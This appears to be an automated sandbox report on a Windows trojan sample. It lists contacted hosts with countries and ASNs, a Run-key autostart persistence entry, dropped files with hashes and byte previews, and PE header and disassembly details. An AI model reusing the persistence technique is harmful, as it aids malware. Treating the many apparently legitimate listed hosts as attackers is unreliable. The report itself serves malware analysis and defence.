                                                                                                                                                                                                                                                                        8311REDESTELRedestel-RedesdigitalesdeTelecomunicacionenItrue
                                                                                                                                                                                                                                                                        198.49.23.144
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                        83.223.113.46
                                                                                                                                                                                                                                                                        dataform.co.ukUnited Kingdom
                                                                                                                                                                                                                                                                        29017GYRONGBfalse
                                                                                                                                                                                                                                                                        91.229.22.126
                                                                                                                                                                                                                                                                        pleszew.policja.gov.plPoland
                                                                                                                                                                                                                                                                        198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                                                                                                                        5.39.75.157
                                                                                                                                                                                                                                                                        bosado.comFrance
                                                                                                                                                                                                                                                                        16276OVHFRtrue
                                                                                                                                                                                                                                                                        69.195.90.46
                                                                                                                                                                                                                                                                        rtcasey.comUnited States
                                                                                                                                                                                                                                                                        46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                                                                                        172.67.165.62
                                                                                                                                                                                                                                                                        www.snugpak.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        217.74.161.133
                                                                                                                                                                                                                                                                        cnti.krsn.ruRussian Federation
                                                                                                                                                                                                                                                                        16300INTERTAX-AREARUtrue
                                                                                                                                                                                                                                                                        83.167.255.150
                                                                                                                                                                                                                                                                        dzm.czCzech Republic
                                                                                                                                                                                                                                                                        24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                                                                                                                        66.226.70.66
                                                                                                                                                                                                                                                                        mail.airmail.netUnited States
                                                                                                                                                                                                                                                                        30447INFB2-ASUSfalse
                                                                                                                                                                                                                                                                        85.128.196.22
                                                                                                                                                                                                                                                                        strazynski.plPoland
                                                                                                                                                                                                                                                                        15967NAZWAPLtrue
                                                                                                                                                                                                                                                                        202.254.236.40
                                                                                                                                                                                                                                                                        www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                                        81.2.194.241
                                                                                                                                                                                                                                                                        www.edimart.huCzech Republic
                                                                                                                                                                                                                                                                        24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                                                                                                                        37.59.243.164
                                                                                                                                                                                                                                                                        aluminox.esFrance
                                                                                                                                                                                                                                                                        16276OVHFRtrue
                                                                                                                                                                                                                                                                        154.81.136.239
                                                                                                                                                                                                                                                                        mjrcpas.comSeychelles
                                                                                                                                                                                                                                                                        35916MULTA-ASN1UStrue
                                                                                                                                                                                                                                                                        217.19.254.22
                                                                                                                                                                                                                                                                        shanks.co.ukUnited Kingdom
                                                                                                                                                                                                                                                                        60819SAFENAMES-ASGBtrue
                                                                                                                                                                                                                                                                        35.186.238.101
                                                                                                                                                                                                                                                                        onzcda.comUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        185.163.45.187
                                                                                                                                                                                                                                                                        softizer.comMoldova Republic of
                                                                                                                                                                                                                                                                        39798MIVOCLOUDMDtrue
                                                                                                                                                                                                                                                                        93.189.66.202
                                                                                                                                                                                                                                                                        ssm.chSwitzerland
                                                                                                                                                                                                                                                                        12347VIRTUALTECCHtrue
                                                                                                                                                                                                                                                                        109.71.54.22
                                                                                                                                                                                                                                                                        akdeniz.nlNetherlands
                                                                                                                                                                                                                                                                        202053UPCLOUDFItrue
                                                                                                                                                                                                                                                                        219.94.129.97
                                                                                                                                                                                                                                                                        web-york.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                        49.212.232.113
                                                                                                                                                                                                                                                                        unicus.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                        104.21.89.126
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                        74.208.215.145
                                                                                                                                                                                                                                                                        indonesiamedia.comUnited States
                                                                                                                                                                                                                                                                        8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                                        104.21.30.14
                                                                                                                                                                                                                                                                        cubodown.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        54.36.175.146
                                                                                                                                                                                                                                                                        unknownFrance
                                                                                                                                                                                                                                                                        16276OVHFRtrue
                                                                                                                                                                                                                                                                        104.26.10.81
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        46.30.60.158
                                                                                                                                                                                                                                                                        ncn.deGermany
                                                                                                                                                                                                                                                                        15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEfalse
                                                                                                                                                                                                                                                                        172.67.183.62
                                                                                                                                                                                                                                                                        adventist.roUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        104.21.23.9
                                                                                                                                                                                                                                                                        www.jenco.co.ukUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        77.78.104.3
                                                                                                                                                                                                                                                                        zupraha.czCzech Republic
                                                                                                                                                                                                                                                                        15685CASABLANCA-ASInternetCollocationProviderCZfalse
                                                                                                                                                                                                                                                                        192.99.226.184
                                                                                                                                                                                                                                                                        s5w.comCanada
                                                                                                                                                                                                                                                                        16276OVHFRfalse
                                                                                                                                                                                                                                                                        49.212.180.178
                                                                                                                                                                                                                                                                        kumaden.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                        195.78.66.50
                                                                                                                                                                                                                                                                        www.photo4b.comPoland
                                                                                                                                                                                                                                                                        41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                                                                                                                        137.118.26.67
                                                                                                                                                                                                                                                                        fnw.usUnited States
                                                                                                                                                                                                                                                                        6250NEONOVA-NETUSfalse
                                                                                                                                                                                                                                                                        192.124.249.9
                                                                                                                                                                                                                                                                        fdlymca.orgUnited States
                                                                                                                                                                                                                                                                        30148SUCURI-SECUSfalse
                                                                                                                                                                                                                                                                        188.166.152.188
                                                                                                                                                                                                                                                                        www.c9dd.comNetherlands
                                                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                        185.253.212.22
                                                                                                                                                                                                                                                                        karmy.com.plPoland
                                                                                                                                                                                                                                                                        48707GREENER-ASPLfalse
                                                                                                                                                                                                                                                                        15.204.18.132
                                                                                                                                                                                                                                                                        15.204.18.132.datacname.comUnited States
                                                                                                                                                                                                                                                                        71HP-INTERNET-ASUSfalse
                                                                                                                                                                                                                                                                        210.140.73.39
                                                                                                                                                                                                                                                                        at-shun.comJapan4694IDCFIDCFrontierIncJPfalse
                                                                                                                                                                                                                                                                        31.177.80.70
                                                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                                                        48287RU-CENTERRUtrue
                                                                                                                                                                                                                                                                        70.39.251.249
                                                                                                                                                                                                                                                                        quadlock.comUnited States
                                                                                                                                                                                                                                                                        54641INMOTI-1USfalse
                                                                                                                                                                                                                                                                        104.26.7.221
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        5.134.13.210
                                                                                                                                                                                                                                                                        nels.co.ukUnited Kingdom
                                                                                                                                                                                                                                                                        34282UKNOC-ASGBtrue
                                                                                                                                                                                                                                                                        216.239.38.21
                                                                                                                                                                                                                                                                        calvinly.comUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        62.75.216.137
                                                                                                                                                                                                                                                                        www.tyrns.comGermany
                                                                                                                                                                                                                                                                        8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                                                                                                                                        195.5.116.23
                                                                                                                                                                                                                                                                        enguita.netSpain
                                                                                                                                                                                                                                                                        39787TV2-NORWAYNOfalse
                                                                                                                                                                                                                                                                        203.0.113.0
                                                                                                                                                                                                                                                                        nme.co.jpReserved
                                                                                                                                                                                                                                                                        136518WA-GOVERNMENT-AS-APWAGovernmentprojectAUtrue
                                                                                                                                                                                                                                                                        208.100.26.245
                                                                                                                                                                                                                                                                        atb-lit.comUnited States
                                                                                                                                                                                                                                                                        32748STEADFASTUStrue
                                                                                                                                                                                                                                                                        142.250.27.27
                                                                                                                                                                                                                                                                        gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        142.250.27.26
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        51.159.3.117
                                                                                                                                                                                                                                                                        ossir.orgFrance
                                                                                                                                                                                                                                                                        12876OnlineSASFRtrue
                                                                                                                                                                                                                                                                        82.201.61.230
                                                                                                                                                                                                                                                                        www.nelipak.nlNetherlands
                                                                                                                                                                                                                                                                        15879KPN-INTERNEDSERVICESNLfalse
                                                                                                                                                                                                                                                                        79.124.76.247
                                                                                                                                                                                                                                                                        mkm-gr.comBulgaria
                                                                                                                                                                                                                                                                        31083TELEPOINTBGtrue
                                                                                                                                                                                                                                                                        172.67.71.13
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                        172.67.68.180
                                                                                                                                                                                                                                                                        canasil.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        66.111.4.75
                                                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                                                        11403NYINTERNETUStrue
                                                                                                                                                                                                                                                                        208.80.123.195
                                                                                                                                                                                                                                                                        gbp-jp.comUnited States
                                                                                                                                                                                                                                                                        16552TIGGEEUStrue
                                                                                                                                                                                                                                                                        46.19.218.80
                                                                                                                                                                                                                                                                        mcseurope.nlNetherlands
                                                                                                                                                                                                                                                                        20559FUNDAMENTS-ASNLtrue
                                                                                                                                                                                                                                                                        34.102.136.180
                                                                                                                                                                                                                                                                        hamaker.netUnited States
                                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                        172.67.148.35
                                                                                                                                                                                                                                                                        forbin.netUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                        13.248.216.40
                                                                                                                                                                                                                                                                        www.findbc.comUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        61.200.81.23
                                                                                                                                                                                                                                                                        yasuma.comJapan2914NTT-COMMUNICATIONS-2914UStrue
                                                                                                                                                                                                                                                                        104.21.50.140
                                                                                                                                                                                                                                                                        juso-gr.chUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                        192.241.158.94
                                                                                                                                                                                                                                                                        nunomira.comUnited States
                                                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                        172.67.189.68
                                                                                                                                                                                                                                                                        kavram.comUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                        63.251.106.25
                                                                                                                                                                                                                                                                        kewlmail.comUnited States
                                                                                                                                                                                                                                                                        29791VOXEL-DOT-NETUStrue
                                                                                                                                                                                                                                                                        212.44.102.57
                                                                                                                                                                                                                                                                        oozkranj.comSlovenia
                                                                                                                                                                                                                                                                        43128DHH-ASSItrue
                                                                                                                                                                                                                                                                        85.233.160.148
                                                                                                                                                                                                                                                                        hbfuels.comUnited Kingdom
                                                                                                                                                                                                                                                                        8622ISIONUKNamescoLimitedGBfalse
                                                                                                                                                                                                                                                                        164.132.175.106
                                                                                                                                                                                                                                                                        zemarmot.netFrance
                                                                                                                                                                                                                                                                        16276OVHFRtrue
                                                                                                                                                                                                                                                                        95.174.22.233
                                                                                                                                                                                                                                                                        snf.itItaly
                                                                                                                                                                                                                                                                        12637SEEWEBWebhostingcolocationandcloudservicesITtrue
                                                                                                                                                                                                                                                                        104.164.117.233
                                                                                                                                                                                                                                                                        arowines.comUnited States
                                                                                                                                                                                                                                                                        18779EGIHOSTINGUStrue
                                                                                                                                                                                                                                                                        165.227.252.190
                                                                                                                                                                                                                                                                        crcsi.orgUnited States
                                                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                        185.151.30.147
                                                                                                                                                                                                                                                                        pertex.comUnited Kingdom
                                                                                                                                                                                                                                                                        48254TWENTYIGBtrue
                                                                                                                                                                                                                                                                        199.34.228.78
                                                                                                                                                                                                                                                                        ftmobile.comUnited States
                                                                                                                                                                                                                                                                        27647WEEBLYUSfalse
                                                                                                                                                                                                                                                                        81.171.22.7
                                                                                                                                                                                                                                                                        www.railbook.netNetherlands
                                                                                                                                                                                                                                                                        60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                                                                                        185.230.63.107
                                                                                                                                                                                                                                                                        sokuwan.netIsrael
                                                                                                                                                                                                                                                                        58182WIX_COMILtrue
                                                                                                                                                                                                                                                                        198.185.159.145
                                                                                                                                                                                                                                                                        riwn.orgUnited States
                                                                                                                                                                                                                                                                        53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                        198.185.159.144
                                                                                                                                                                                                                                                                        captlfix.comUnited States
                                                                                                                                                                                                                                                                        53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                        211.13.196.162
                                                                                                                                                                                                                                                                        unknownJapan7514MEXComputerEngineeringConsultingLtdJPtrue
                                                                                                                                                                                                                                                                        141.193.213.20
                                                                                                                                                                                                                                                                        johnlyon.orgUnited States
                                                                                                                                                                                                                                                                        396845DV-PRIMARY-ASN1UStrue
                                                                                                                                                                                                                                                                        35.172.94.1
                                                                                                                                                                                                                                                                        themark.orgUnited States
                                                                                                                                                                                                                                                                        14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                        195.128.140.29
                                                                                                                                                                                                                                                                        nettle.plPoland
                                                                                                                                                                                                                                                                        56590RBO-NETPLtrue
                                                                                                                                                                                                                                                                        104.20.54.214
                                                                                                                                                                                                                                                                        bible.orgUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        76.223.35.103
                                                                                                                                                                                                                                                                        nrsi.comUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                        92.204.129.113
                                                                                                                                                                                                                                                                        lpver.comGermany
                                                                                                                                                                                                                                                                        398108GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                                        159.89.244.183
                                                                                                                                                                                                                                                                        tcpoa.comUnited States
                                                                                                                                                                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                        69.163.239.62
                                                                                                                                                                                                                                                                        sjbs.orgUnited States
                                                                                                                                                                                                                                                                        26347DREAMHOST-ASUSfalse
                                                                                                                                                                                                                                                                        Joe Sandbox Version:37.0.0 Beryl
                                                                                                                                                                                                                                                                        Analysis ID:823805
                                                                                                                                                                                                                                                                        Start date and time:2023-03-10 07:53:11 +01:00
                                                                                                                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                                                        Overall analysis duration:0h 15m 19s
                                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:27
                                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                                        • HDC enabled
                                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                        Sample file name:iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        Original Sample Name:3e7a4148f1133cb4b8a097fd74590f44.exe
                                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                                        Classification:mal100.spre.troj.evad.winEXE@33/4@1944/100
                                                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                        HDC Information:
                                                                                                                                                                                                                                                                        • Successful, ratio: 49% (good quality ratio 44.8%)
                                                                                                                                                                                                                                                                        • Quality average: 74.8%
                                                                                                                                                                                                                                                                        • Quality standard deviation: 32%
                                                                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                                                                        • Number of executed functions: 171
                                                                                                                                                                                                                                                                        • Number of non-executed functions: 91
                                                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.21.63.28, 172.67.142.169, 204.79.197.212
                                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, www.ottospm.com.cdn.cloudflare.net, ctldl.windowsupdate.com, a-0010.a-msedge.net
                                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                                                        07:54:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                        07:54:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                        07:55:18API Interceptor2x Sleep call for process: iJzpyjAehB.exe modified
                                                                                                                                                                                                                                                                        07:55:30API Interceptor2x Sleep call for process: pigalicapi.exe modified
                                                                                                                                                                                                                                                                        07:56:06API Interceptor31x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):49
                                                                                                                                                                                                                                                                        Entropy (8bit):1.2701062923235522
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:/l1PL3n:fPL3
                                                                                                                                                                                                                                                                        MD5:CD8FA61AD2906643348EEF98A988B873
                                                                                                                                                                                                                                                                        SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                                                                                                                                                                                                                                                                        SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                                                                                                                                                                                                                                                                        SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:........................................user.
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1446
                                                                                                                                                                                                                                                                        Entropy (8bit):7.411000424839019
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:EtPRDylUWMd6Pfv4cnZpJjBeoLMejJzWoovUw66GqfPAknWMDWO0j:EtP5ylUWMlcZnVeodlzSHPAknWM69
                                                                                                                                                                                                                                                                        MD5:39686D77FF403EA1AB5C057A9344B665
                                                                                                                                                                                                                                                                        SHA1:768649AF4207752FE00533A6E0B3E0A54151767F
                                                                                                                                                                                                                                                                        SHA-256:7B4007840330A459D96145F685D72D6F61CB72EAD4075E01B8E6D08C6480C277
                                                                                                                                                                                                                                                                        SHA-512:FAD831A9A0667FCD1893489FB293A8FD0CB6174756F220CE0005BD416A4C9E3EB6071E8CB27C940F3C2C4662F487C3342E3AB23D3F3D601D92DB1DFA202B3FA3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O.......=.u2[C..;....`....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....'...Z8<..r......a.+P.w................... ....\6........ApRC..$..;..>....hzi....P.Ky...Z.(........^..n.7.fM..|I.R9..f.U.B...."*...+q...&E7l...a..B=...H...............'.......C.2...;e>-...c.|ST...R.._r...S#F.-...+VOk`hf...jOA.....!.../......7..%.......X.z.f....7.C.....e2..'.j.r..... .E...S.Y."...0'..t..1..w.........GJ2...b.....Q7xWp..a.O5...B......Q....2..?1...........D..Q63._N.b..)_R.>9.-3lK;...\...,.R.d.G...,...3.d"2.O..........$@./;;t.....n.D...~.H.K[.>(.E..R...n~..\m.P.p...J.......0|....F.....r.c'b...?.S.;.:....(.b)u.0.Z........d!3&V.6w.v......`7.O.p..Y.@..:.kU.T{.h>V0....i.DO.Bw.....[....Nk.<.P.p.[. /..N..ekb.R....U.$.I.&..>
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):153884
                                                                                                                                                                                                                                                                        Entropy (8bit):6.960691881776276
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:nHcXFmx32TcZ8BCNDoeRHRQEQcUgaZutJ3gZNGxFh+Lx5s+5DFB+Er/qObMg8:H7gcNDnxQEdUStJ3gyxX+LU6iEr/qOK
                                                                                                                                                                                                                                                                        MD5:3E7A4148F1133CB4B8A097FD74590F44
                                                                                                                                                                                                                                                                        SHA1:FEC43C982B497F4DDBB8C35245C295355676A07A
                                                                                                                                                                                                                                                                        SHA-256:6618359D4D19997728359453B0598BE7562C293EF9D6AC51F2635586096A52BD
                                                                                                                                                                                                                                                                        SHA-512:D641E92A6BF6A52DC46363A8570DCA2D8F290E18BB60AC0D2D26C328F2437CACA68FC3E5AD89F120ED5E871729EF4E37A8931CFE468A0C2027DBBC6FE8C67B9D
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 52%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t..d.....................z...............0....@........................................... ..............................`..........tS...........................................................................a...............................text...x...........................`.0`.data...(....0......................@.0..rdata..8....@......................@.0@.bss.........P........................@..idata.......`....... ..............@.0..CRT.........p.......(..............@.0..tls.... ............*..............@.0..rsrc...tS.......T...,..............@.0./4..................................@..B/19.................................@..B/35.................................@..B/51.....67... ...8..................@..B/63.....a....`......................@..B/77.....8....p......................@..B/89.................................@.0B/102....................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.960691881776276
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        File size:153884
                                                                                                                                                                                                                                                                        MD5:3e7a4148f1133cb4b8a097fd74590f44
                                                                                                                                                                                                                                                                        SHA1:fec43c982b497f4ddbb8c35245c295355676a07a
                                                                                                                                                                                                                                                                        SHA256:6618359d4d19997728359453b0598be7562c293ef9d6ac51f2635586096a52bd
                                                                                                                                                                                                                                                                        SHA512:d641e92a6bf6a52dc46363a8570dca2d8f290e18bb60ac0d2d26c328f2437caca68fc3e5ad89f120ed5e871729ef4e37a8931cfe468a0c2027dbbc6fe8c67b9d
                                                                                                                                                                                                                                                                        SSDEEP:1536:nHcXFmx32TcZ8BCNDoeRHRQEQcUgaZutJ3gZNGxFh+Lx5s+5DFB+Er/qObMg8:H7gcNDnxQEdUStJ3gyxX+LU6iEr/qOK
                                                                                                                                                                                                                                                                        TLSH:8BE34BD6BFC91D8BE725423EDCEAD352623EF6F50A821F13242949771B325952EC0287
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t..d.....................z...............0....@........................................... ............................
                                                                                                                                                                                                                                                                        Icon Hash:00828e8e8686b000
                                                                                                                                                                                                                                                                        Entrypoint:0x401284
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                                                                                                        Time Stamp:0x64088874 [Wed Mar 8 13:07:00 2023 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:0x401c60, 0x401c2c
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:6e4f30e5ff96a025a586abf0edae33b8
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 18h
                                                                                                                                                                                                                                                                        mov dword ptr [esp], 00000002h
                                                                                                                                                                                                                                                                        call dword ptr [00406214h]
                                                                                                                                                                                                                                                                        call 00007F45F0D76949h
